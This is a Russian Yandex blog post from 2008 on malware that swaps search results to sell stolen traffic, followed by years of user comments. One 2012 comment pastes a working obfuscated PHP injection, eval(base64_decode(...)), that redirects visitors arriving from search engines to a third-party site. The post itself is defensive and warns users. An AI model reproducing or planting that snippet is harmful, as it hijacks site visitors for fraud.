ПоискПочтаДискКалендарьДеньгиМой КругФотки
Войти


Чтобы получить доступ ко всем возможностям Я.ру, создайте страницу или , если у вас она уже есть.
(^_^)

 

 

записи по  

месяцам · меткам · типам

выделить все / снять выделение

Показать
Яндекс для вебмастеров написал
27 мая 2008 года, 20:33
(^_^)
Вирус подмены страниц

В последнее время в Рунете появилось вредоносное программное обеспечение нового типа – программы, созданные для искажения страниц в браузере пользователя. Поскольку нас интересует поиск, мы рассмотрим деятельность этих программ в контексте поисковых систем.

 

В строгом понимании термина «вирус» эти программы вирусами не являются, однако механизм их работы очень похож на деятельность вирусов, поэтому условимся называть такое ПО «вирусом подмены страниц». При обращении пользователя, компьютер которого заражен таким вирусом, к поисковой системе вирус изменяет один из результатов поиска. Таким образом, пользователь переходит не на сайт, найденный поисковой системой, а на какой-то другой.

 

Эта проблема существует для всех популярных в Рунете поисковиков – для Яндекса, Google, Рамблера, MSN (Live). Кроме того, вирус может подменять не только страницы с результатами поиска, а вообще любые сайты.

 

Вирус подмены страниц может попасть на компьютер вместе с какой-нибудь программой, загруженной из интернета. Например, вместе с бесплатным ускорителем закачки файлов BitAccelerator, который предоставляется файлообменным сервисом Letitbit.net. Вместе с этой программой пользователь скачивает скрытую библиотеку. Эта библиотека остается на компьютере пользователя и при удалении BitAccelerator.

 

Чаще всего на зараженном компьютере вирус ведет себя одним из двух способов:

 
  • Вирус подменяет html-код страницы с      результатами поиска, подставляя вместо одного из результатов ссылку и      описание другого сайта. Дизайн и общий вид подмененной позиции похожи на      обычные результаты поиска, но сам сайт к заданному запросу отношения не      имеет. Например, по запросу [самолет] выводится порносайт, или по запросу [Яндекс]      – сайт другой компании. Если задать тот же самый запрос еще раз, нерелевантный      сайт исчезнет из результатов поиска.
  • Другой вариант появился позднее,      возможно, вследствие того, что пользователи меньше кликали по      нерелевантным ответам. По запросу пользователя страница выдачи не      изменяется, но при переходе по одному из первых результатов поиска вирус      переадресовывает пользователя на другой сайт.
 

Вирус подмены страниц используется для воровства и продажи трафика – с его помощью можно получить, по самым скромным оценкам, несколько сот тысяч переходов в день. Переходы пользователей продаются рекламодателям как контекстная реклама.

 

Схема работы мошенников выглядит следующим образом:

 
  • Рекламодатель заказывает рекламу      сайта по определенным ключевым словам. Эти слова передаются в программу,      работающую на удаленном сервере злоумышленников.
  • Когда пользователь заходит с      зараженного компьютера на сайт какой-нибудь поисковой системы и вводит      запрос в строке поиска, вирус активизируется и передает запрос на сервер      мошенников. Если этот запрос содержится в программе, в ответ приходит      адрес сайта, который подставляется в выдачу поисковика.
  • Пользователь переходит по ложной      ссылке и уходит, решив, что поисковая система дала ему нерелевантный      ответ. При этом вирус модифицирует HTTP-запрос таким образом, что в логи      посещенного сайта записывается переход с рекламной сети мошенников –      поэтому рекламодатель заплатит за этот переход.
 

В результате проигрывают все – кроме авторов вируса, конечно. Пользователь не находит нужную информацию. Рекламодатель платит за нецелевой трафик. Поисковая система теряет репутацию – обнаружив последствия работы вируса подмены, некоторые пользователи обвиняют поисковики в продаже мест на первых страницах выдачи.

 

До недавнего времени антивирусные компании классифицировали вирусы подмены страниц просто как рекламный софт – не особо полезный, но вроде бы и не вредный. В результате совместных с нами обсуждений и исследований большинство антивирусных компаний пришло к выводу, что такие программы представляют несомненную угрозу. Сейчас большинство производителей антивирусов перевели вирусы подмены страниц в класс вредоносного и опасного ПО. Антивирусы компаний Dr.Web, «Лаборатория Касперского», ESET (NOD32), Panda Security обнаруживают и автоматически удаляют все известные версии вируса подмены страниц.

 

Кроме того, можно избавиться от вируса при помощи бесплатного приложения Я.Онлайн с антивирусом Касперского или утилиты CureIt от "Доктора Веба". Скачать Я.Онлайн можно по адресу online.yandex.ru, а утилиту CureIt – с сайта компании "Доктор Веб": freedrweb.com.

 

Мы рассчитываем на то, что вместе с антивирусными компаниями нам удастся остановить распространение вируса и появление его новых образцов.

 

 

 

Если вы подозреваете, что ваш компьютер заражен вирусом подмены страниц, пишите по адресу – safesearch@yandex-team.ru. Мы обязательно поможем.

 

 

 

Александр Садовский

.
(^_^)
Nihil Bene в ответ поделился ссылкой у себя
27 мая 2008 года, 20:42
При обращении пользователя, компьютер которого заражен таким вирусом, к поисковой системе вирус изменяет один из результатов поиска. Таким образом, пользователь переходит не на сайт, найденный поисковой системой, а на какой-то другой.
(^_^)
kukutz в ответ поделилось ссылкой у себя
27 мая 2008 года, 21:07
Позиция Яндекса по поводу вирусов, которые меняют страницы, в том числе выдачу поисковиков.
(^_^)
Святой Валентин в ответ поделился ссылкой у себя
27 мая 2008 года, 21:11
Если вы подозреваете, что ваш компьютер заражен вирусом подмены страниц, пишите по адресу – safesearch@yandex-team.ru. Мы обязательно поможем.
(^_^)
cepik в ответ поделился ссылкой у себя
27 мая 2008 года, 21:23
Вирус подмены страниц, голактеко в опасносте! Но Яндекс.Поиск в курсе, и на страже.
Запись с ответом была удалена
(^_^)
Finnr Rastas в ответ поделился ссылкой у себя
27 мая 2008 года, 21:45
Схема работы мошенников выглядит следующим образом...

Все так подробно расписано.. вот как надо деньги зарабатывать :)
(^_^)

ɐɥsıqɯ

28 мая 2008 года, 00:04
Теоретически — да. Поэтому лучше не запускать программы из ненадежных источников.
Запись с ответом была удалена
(^_^)
Монстер в ответ поделился ссылкой у себя
28 мая 2008 года, 00:04
хе хе, встречал такой у знакомого на компе :)
пересылал на рбк.ру :)
(^_^)

fedyakov

28 мая 2008 года, 01:26
"А знаете ли вы, что..." :)

...BitAccelerator никакой не "ускоритель закачки", он всего лишь добавляет в запрос заголовок с ключом, без которого Letitbit просто не позволяет качать файлы.

...если по запросу контекстного объявления не найдено, то подставляется ссылка на rbc.ru (или просто в Магне наплодили объявлений для РБК по всем средне- и высокочастотникам).
(^_^)

volvox

3 июля 2008 года, 14:21
Все верно, РБК видимо теряет свои позиции как финансовый аналитик с уважаемым мнением, поэтому за нехилые бабки скупает весь мусор у Яндекса и тем самым засоряя поисковую выдачу. Надо Яндексу отказать РБК  в этой услуге, и ьтогда Яндекс будет чистый и пушистый и стоить его акции будут более дорого
(^_^)

Майк Ильин

28 мая 2008 года, 02:38
Ну наконец-то дело сдвинулось с мёртвой точки! Приятно осознавать, что я к этому тоже приложил немало усилий.. :)
Ещё бы производителей вирусов найти...
(^_^)
Fenrir в ответ поделилось ссылкой у себя
28 мая 2008 года, 06:52
Может таким макаром мне вчерась вместо 5 советов верстальщику порнуха выпала? Хотя откуда заразе-то взяться...
(^_^)

битлз

28 мая 2008 года, 09:35
Проблема такая действительно имеет место быть, но под приведенное выше описание попадает и надстройка для браузера seoquake, поскольку она меняет  страницу с выдачей, добавляя к ней строчку рекламы и параметры сайтов в серпе.
С ней антивирусники и Яндекс тоже будут бороться?
(^_^)

CLS

28 мая 2008 года, 10:26
Если seoquake будет незаметно устанавливаться без ведома пользователя, то, подозреваю, что будут и с ней бороться -)
(^_^)
Ale[x] в ответ поделился ссылкой у себя
28 мая 2008 года, 23:51
Letitbit.net рассылает вирус вместо ускорителя закачки.
(^_^)

captaras

29 мая 2008 года, 16:06
Это ответ крупного бизнеса на агрессивную политику Яндекса к SEO. Если не выходит купить позиции с помощью ссылок, покупают пользователей оптом. Жесть.
:(((

Эдак Яндекс всех пользователей растеряет...
(^_^)

captaras

29 мая 2008 года, 16:34
Пользуясь случаем хочу пожаловаться на службу
webmaster.yandex.ru/delspam.xml  Несколько писем на протяжении 5 месяцев про сайты содержащие спам, оставлены без внимания. Рамблер среагировал мгновенно. Возьмите меня на работу начальником этой службы. Обещаю навести порядок.
(^_^)

russznahar

30 мая 2008 года, 09:50
Вот это контрудар по сеошникам.... Мораль не фиг скачивать с левых сайтов проги халявные
(^_^)
Ишем_И в ответ поделился ссылкой у себя
30 мая 2008 года, 22:04
Вирус лечится бесплатным CureIt от DrWeb

см.ещё: Атака трояна в Одноклассниках
(^_^)
Diversant в ответ поделился ссылкой у себя
31 мая 2008 года, 16:49
Как то я это пропустил, может еще кто невидел...

Позиция Яндекса по поводу вирусов, которые меняют страницы, в том числе выдачу поисковиков.
(^_^)

Макс Скво

31 мая 2008 года, 22:25
Как мягко и ненавязчиво предложили "Я.Онлайн с антивирусом Касперского"...
Или только у меня такое ощущение возникло?
(^_^)

Евгений Стахов

1 июня 2008 года, 17:05
Так, а приведенный BitAcellerator и является вирусом? Просто недавно добавил его в доверенную зону, не думал что такой сервис может вирус подсунуть...

Частенько приходится скачивать с него файлы
(^_^)

loveSun2006

3 июня 2008 года, 10:26
поменьше порнухи смотреть надо или качать её из торрентов..и все будет ок...
(^_^)

ar-ma-vi

24 декабря 2008 года, 22:01
у меня сейчас тот самый вирус :(

не могу курсовик сделать, никакой поисковик не работает. только апорт :(
(^_^)

<?=ЫЫЫ

5 июня 2008 года, 18:51
Да, было дело. Странно, что Яндекс так долго реагировал - первый случай мне известен чуть ли не в декабре. Один из компов отправлял на РБК.ру. Лечилось чисткой куков и временных файлов. Свежайшие на тот момент NOD32, CureIt (DrWeb),  онлайн - Касперский ничего не нашли.
(^_^)

Наталья Фёдоровна

14 июня 2008 года, 16:55
Здравствуйте! писала в службу поддержки ответа пока нет а вопрос очень срочный! У меня проблема, мне пришло письмо на мой эл ящик shurshalka0@ya.ru из службы поддержки Яндекса, в котором была информация о том что на меня поступила какая то жалоба, я не придала должного значения этому письму и мой ящик заблокировали, ответ на контрольный вопрос я не помню. Все бы ничего, да только я со своего аккаунта веду рекламные кампании на Яндекс.Директ. И на моем эл кошельке лежат деньги, соответственно доступ и туда мне закрыт. Помогите мне пожалуйста решить эту проблему. жду ответа на этот ящик mamapapa4@ya.ru
(^_^)

Облачко

4 июля 2008 года, 19:41
Заразил своего ослика этой заразой, с поисковиков (ya, google) перекидывает на "Твой Поиск" (каталог)... Антивир лень скачивать, поэтому поставил свежую мозилу.... юзаю 2 недели, проблем нету, а щас только щас узнал как от вируса избавиться... ) но смысла по большому счету уже нету... все равно комп надо выкидывать )
(^_^)

aalexstorm

28 июля 2008 года, 20:22
У меня тоже было такое. Например ищешь сайт Библиотека программиста, а тебя перебрасывает на rbc.ru из результатов поиска. Ищешь Портал для вебмастеров и опять тоже самое. Но проблема решается просто. Открываем поиск файлов, ищем ConnectionServices.dll и удаляем все найденные экземпляры.
(^_^)

superpapok

11 сентября 2008 года, 22:39
у меня повысились приходы с Яндекса
может случайное совпадение?
(^_^)

АхЭТА

5 апреля 2009 года, 03:56
Спасибо, поняла... Было дело, сейчас нет... Наверно, антивирусная программа излечила... Но почему у меня сбивается в выключенном ПК время? Первый раз такое за 20 лет...
(^_^)

Свадьба на Пхукете в Таиланде

29 апреля 2009 года, 04:41
может батарейка села на маме, которая отвечает за сохранность настроек биоса, вот батарейка не работает и не помнит у тебя биос сколько времени...
(^_^)

АхЭТА

29 апреля 2009 года, 07:00
Большое спасибо за совет и внимание!
(^_^)

Anodonta

30 апреля 2009 года, 11:15
У меня подобное безобразие:
Каждые 10 минут при открытом браузере Firefox открывается страница с порносайтом или онлайн-казино (англоязычные).
В других браузерах такого не наблюдается.
Переустановка браузера не помогла.
При обновлении версии браузера проблема не решается.
Mozilla Firefox 3.0.8 -> Mozilla Firefox 3.0.9 -> Mozilla Firefox 3.0.10
Антивирусная проверка ESET, DrWeb, Avira, AVZ не выявили проблем. :(
(^_^)

0

4 августа 2011 года, 20:55

Да причем тут почта, мне подменяют Яндекс на хто знает что (но потом оказывается в нижней строчке, никогда не угадаете,) - mail.ru >:-)>:-)

(^_^)

vikt-bondarev

28 мая 2012 года, 11:32

вирус, который активируется 27 числа, подхватил такой, заразил многие файлы 

<?php
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciw2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNlbGxjbGFzc2ljcy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ==")););

при прямом заходе - нормально всё, при переходе через поисковик - перекидывает на http://minkof.sellclassics.com/ уже 3й раз заражаю им сайты, не знаю что делать. Скорее всего дело в кукисах оперы (в ней сижу) , т.к. фтп пароли не сохраняю. Версия сайтов - Joomla 1.5.xx

(^_^)

zakupki2014

21 января, 16:48

Смотрю тема аж с 2008 года, а она все еще актуально. Купил себе на днях новый ноут. Начал устанавливать все необходимое. И вот дошел до необходимой мне Filezilla. Набираю в поисковике, а меня выкидывает на какой-то сайт, очень похожий на официальный. Но сомнения берут верх. Перепроверяю все. Даже в википедии набрал. Там статья есть про Filezilla, в ней ссылка на официальный сайт. Прохожу и опять на тот же подозрительный сайт. Ну думаю ладно, значит так должно быть. Скачиваю, устанавливаю, и вуаля, хватаю вирус на новый комп. По всей видимости уже второй, т.к. уже был направлен на эту страничку первым вирусом. Слава богу ноут новый совсем и на нем почти ничего не было. Вылечил возвратом к заводским установкам. Естественно все, что до этого установил, включая обновление до Windows 8.1, похерилось. Теперь все по новой. 

К слову. С рабочего компа пробую найти FileZilla и все нормуль. Даже не могу найти тот сайт, на который выкидывало новый ноут. 

 

 

 

(^_^)

zakupki2014

21 января, 16:49

Смотрю тема аж с 2008 года, а она все еще актуально. Купил себе на днях новый ноут. Начал устанавливать все необходимое. И вот дошел до необходимой мне Filezilla. Набираю в поисковике, а меня выкидывает на какой-то сайт, очень похожий на официальный. Но сомнения берут верх. Перепроверяю все. Даже в википедии набрал. Там статья есть про Filezilla, в ней ссылка на официальный сайт. Прохожу и опять на тот же подозрительный сайт. Ну думаю ладно, значит так должно быть. Скачиваю, устанавливаю, и вуаля, хватаю вирус на новый комп. По всей видимости уже второй, т.к. уже был направлен на эту страничку первым вирусом. Слава богу ноут новый совсем и на нем почти ничего не было. Вылечил возвратом к заводским установкам. Естественно все, что до этого установил, включая обновление до Windows 8.1, похерилось. Теперь все по новой.

К слову. С рабочего компа пробую найти FileZilla и все нормуль. Даже не могу найти тот сайт, на который выкидывало новый ноут.

β-версия

 

Что получается:    изменить 
Подписаться на комментарии к записи

Получать уведомления о всех ответах в этом обсуждении.

 
Отписаться от комментарев к записи

Получать уведомления только о тех ответах в этом обсуждении, которые адресованы лично вам.

 
К сожалению, комментарий не удалось отправить. Попробуйте ещё раз.я в курсе